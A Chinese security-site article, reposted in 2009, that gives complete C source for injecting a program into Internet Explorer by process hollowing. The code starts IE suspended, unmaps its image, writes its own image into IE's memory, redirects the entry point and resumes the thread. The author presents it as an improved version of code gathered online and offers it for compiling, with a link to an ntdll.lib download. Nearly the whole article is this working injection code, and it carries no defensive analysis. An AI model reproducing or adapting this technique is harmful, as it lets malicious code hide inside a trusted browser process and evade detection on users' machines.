黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

一个将自己代码插入IE进程的例子(VC代码)

2009-8-7 12:19| 投稿: security

摘要: 看着别人的程序想插那个进程就插那个,我也想试下,于是从网上找了几段代码,最容易理解的是下面的代码,不过原来的代码编译后在VC IDE下测试正常,但离开IDE就出错,经过测试和程序启动运行知道是因为编译...

免责声明:本站系公益性非盈利IT网站,本文由投稿者转载自互联网,文末已注明出处,其内容和图片版权归原作者所有,文中所述不代表本站观点,若有侵权或转载不当之处请从网站右下角联系我们处理。

看着别人的程序想插那个进程就插那个,我也想试下,于是从网上找了几段代码,最容易理解的是下面的代码,不过原来的代码编译后在VC IDE下测试正常,但离开IDE就出错,经过测试和程序启动运行知道是因为编译后,IE尚未启动完成,程序本身已经退出是出错的原因,因些我改进了一下, 贴在下面:编译须 ntdll.lib文件(可以从http://lengie.ik8.com/test/ntdll_lib_dl.htm下载,里有Win2K,XP 32B,XP 64B三个版本,对应拷到编译器的LIB文件夹里就可以了),可将下面代码保存为 .c 文件然后编译(保存为 .cpp 文件可能会出错) #include <stdio.h>#include <windows.h> #pragma comment(lib,"ntdll.lib") typedef long NTSTATUS; NTSYSAPINTSTATUSNTAPIZwUnmapViewOfSection(HANDLE ProcessHandle,PVOID BaseAddress); typedef struct _ChildProcessInfo{DWORD dwBaseAddress;DWORD dwReserve;} CHILDPROCESS; char szIePath[MAX_PATH]; BOOL FindIePath(char *IePath,int *dwBuffSize);BOOL InjectProcess(void);DWORD GetSelfImageSize(HMODULE hModule); BOOL CreateInjectProcess(PPROCESS_INFORMATION pi,PCONTEXT pThreadCxt,CHILDPROCESS *pChildProcess); int main(void){if (InjectProcess()){printf("This is my a test code,made by shadow3.\r\n");}else{while(1){MessageBox(NULL,"进程插入完成","Text",MB_OK);Sleep(1000);}}Sleep(1000);//等待IE启动 加上这句就可以正常了,呵呵.我设的时间可能有点长return 0;} BOOL FindIePath(char *IePath,int *dwBuffSize){char szSystemDir[MAX_PATH]; GetSystemDirectory(szSystemDir,MAX_PATH); szSystemDir[2] ='\0';lstrcat(szSystemDir,"\\Program Files\\Internet Explorer\\iexplore.exe"); lstrcpy(IePath, szSystemDir);return TRUE;} BOOL InjectProcess(void){char szModulePath[MAX_PATH];DWORD dwImageSize = 0; STARTUPINFO si = {0};PROCESS_INFORMATION pi;CONTEXT ThreadCxt;DWORD *PPEB;DWORD dwWrite = 0;CHILDPROCESS stChildProcess;LPVOID lpVirtual = NULL;PIMAGE_DOS_HEADER pDosheader = NULL;PIMAGE_NT_HEADERS pVirPeHead = NULL; HMODULE hModule = NULL; ZeroMemory(szModulePath,MAX_PATH);ZeroMemory(szIePath,MAX_PATH); GetModuleFileName(NULL,szModulePath,MAX_PATH);FindIePath(szIePath,NULL); if ( lstrcmpiA(szIePath,szModulePath) == 0 ){return FALSE;} hModule = GetModuleHandle(NULL);if ( hModule == NULL ){return FALSE;} pDosheader = (PIMAGE_DOS_HEADER)hModule;pVirPeHead = (PIMAGE_NT_HEADERS)((DWORD)hModule + pDosheader->e_lfanew);_asm nop;_asm nop;_asm nop;_asm nop;dwImageSize = GetSelfImageSize(hModule);_asm nop;_asm nop;_asm nop;_asm nop;if ( CreateInjectProcess(&pi, &ThreadCxt ,&stChildProcess)){printf("CHILD PID: [%d]\r\n",pi.dwProcessId); if ( ZwUnmapViewOfSection(pi.hProcess,(LPVOID)stChildProcess.dwBaseAddress) == 0 ){lpVirtual = VirtualAllocEx(pi.hProcess,(LPVOID)hModule,dwImageSize,MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); if ( lpVirtual ){printf("Unmapped and Allocated Mem Success.\r\n");} }else{printf("ZwUnmapViewOfSection() failed.\r\n");return TRUE;} if ( lpVirtual ){PPEB = (DWORD *)ThreadCxt.Ebx; // 重写装载地址 WriteProcessMemory(pi.hProcess,&PPEB[2],&lpVirtual,sizeof(DWORD),&dwWrite); if ( WriteProcessMemory(pi.hProcess,lpVirtual,hModule,dwImageSize,&dwWrite) ){printf("image inject into process success.\r\n"); ThreadCxt.ContextFlags = CONTEXT_FULL;if ( (DWORD)lpVirtual == stChildProcess.dwBaseAddress ){ThreadCxt.Eax = (DWORD)pVirPeHead->OptionalHeader.ImageBase + pVirPeHead->OptionalHeader.AddressOfEntryPoint;}else{ThreadCxt.Eax = (DWORD)lpVirtual + pVirPeHead->OptionalHeader.AddressOfEntryPoint;} #ifdef DEBUGprintf("EAX = [0x%08x]\r\n",ThreadCxt.Eax);printf("EBX = [0x%08x]\r\n",ThreadCxt.Ebx);printf("ECX = [0x%08x]\r\n",ThreadCxt.Ecx);printf("EDX = [0x%08x]\r\n",ThreadCxt.Edx);printf("EIP = [0x%08x]\r\n",ThreadCxt.Eip);#endif SetThreadContext(pi.hThread, &ThreadCxt);ResumeThread(pi.hThread); }else{printf("WirteMemory Failed,code:%d\r\n",GetLastError());TerminateProcess(pi.hProcess, 0);} }else{printf("VirtualMemory Failed,code:%d\r\n",GetLastError());TerminateProcess(pi.hProcess, 0);}} return TRUE;} DWORD GetSelfImageSize(HMODULE hModule){DWORD dwImageSize; _asm{mov ecx,0x30mov eax, fs:[ecx]mov eax, [eax + 0x0c]mov esi, [eax + 0x0c]add esi,0x20lodsdmov dwImageSize,eax } return dwImageSize;} BOOL CreateInjectProcess(PPROCESS_INFORMATION pi,PCONTEXT pThreadCxt,CHILDPROCESS *pChildProcess) {STARTUPINFO si = {0}; DWORD *PPEB;DWORD read; // 使用挂起模式启动ie if( CreateProcess(NULL, szIePath, NULL, NULL, 0, CREATE_SUSPENDED, NULL, NULL, &si, pi)||MessageBox(0,":(",":(",0)){ pThreadCxt->ContextFlags = CONTEXT_FULL;GetThreadContext(pi->hThread, pThreadCxt);PPEB = (DWORD *)pThreadCxt->Ebx; ReadProcessMemory(pi->hProcess,&PPEB[2],(LPVOID)&(pChildProcess->dwBaseAddress),sizeof(DWORD),&read); return TRUE ; }return FALSE;}

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本站系公益性非盈利IT网站,本文由投稿者转载自互联网,文末已注明出处,其内容和图片版权归原作者所有,文中所述不代表本站观点,若有侵权或转载不当之处请从网站右下角联系我们处理。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部